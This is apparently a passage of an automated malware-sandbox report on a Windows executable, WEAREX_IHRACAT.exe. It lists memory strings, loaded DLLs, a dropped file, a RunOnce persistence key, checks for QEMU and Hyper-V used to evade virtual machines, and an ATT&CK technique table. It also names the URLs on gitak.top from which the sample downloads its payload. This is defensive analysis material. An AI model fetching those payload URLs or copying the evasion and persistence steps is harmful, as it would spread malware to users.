00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binf
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 
00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binl
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bino~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binq
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 
00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828251598.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binz
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/e~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/o~
      Source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 
00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: unknown HTTPS traffic detected: 172.67.207.219:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe File created: C:\Windows\Fonts\logorrheic.ini
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Code function: 0_2_00404B0E 0_2_00404B0E
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Code function: 0_2_0040653D 0_2_0040653D
      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll 5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
      Source: WEAREX_IHRACAT.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine Classification label: mal96.troj.evad.winEXE@3/10@1/1
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Code function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe File created: C:\Users\user\gangningerne
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe File created: C:\Users\user\AppData\Local\Temp\nsrB207.tmp
      Source: WEAREX_IHRACAT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: WEAREX_IHRACAT.exe ReversingLabs: Detection: 57%
      Source: WEAREX_IHRACAT.exe Virustotal: Detection: 70%
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe File read: C:\Users\user\Desktop\WEAREX_IHRACAT.exe
      Source: unknown Process created: C:\Users\user\Desktop\WEAREX_IHRACAT.exe "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Process created: C:\Users\user\Desktop\WEAREX_IHRACAT.exe "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe Section loaded: msi.dll
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: msi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile written: C:\Windows\Fonts\logorrheic.iniJump to behavior
      Source: Binary string: mshtml.pdb source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      Source: Yara matchFile source: 00000002.00000002.6650157112.0000000001721000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2455393389.00000000031C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile created: C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exeJump to dropped file
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile created: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AaregangJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeAPI/Special instruction interceptor: Address: 3B9064C
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeAPI/Special instruction interceptor: Address: 20F064C
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2454702196.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 FILES\QEMU-GA\QEMU-GA.EXEP
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2458782228.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653716052.0000000002A00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2454702196.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEN
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe TID: 5580Thread sleep count: 39 > 30Jump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe TID: 5580Thread sleep time: -390000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2454702196.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeN
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2933900374.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3144180833.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566595182.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653418336.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620738937.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410480994.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093636332.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197529994.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988266502.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6199353892.0000000002897000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6093636332.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620738937.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410480994.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988266502.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6305027978.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6199353892.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653418336.0000000002867000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515602395.0000000002866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2454702196.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 Files\Qemu-ga\qemu-ga.exep
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2458782228.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653716052.0000000002A00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4396
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4392
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess created: C:\Users\user\Desktop\WEAREX_IHRACAT.exe "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"Jump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      Registry Run Keys / Startup Folder
      11
      Process Injection
      11
      Masquerading
      OS Credential Dumping41
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Registry Run Keys / Startup Folder
      11
      Virtualization/Sandbox Evasion
      LSASS Memory11
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      11
      Process Injection
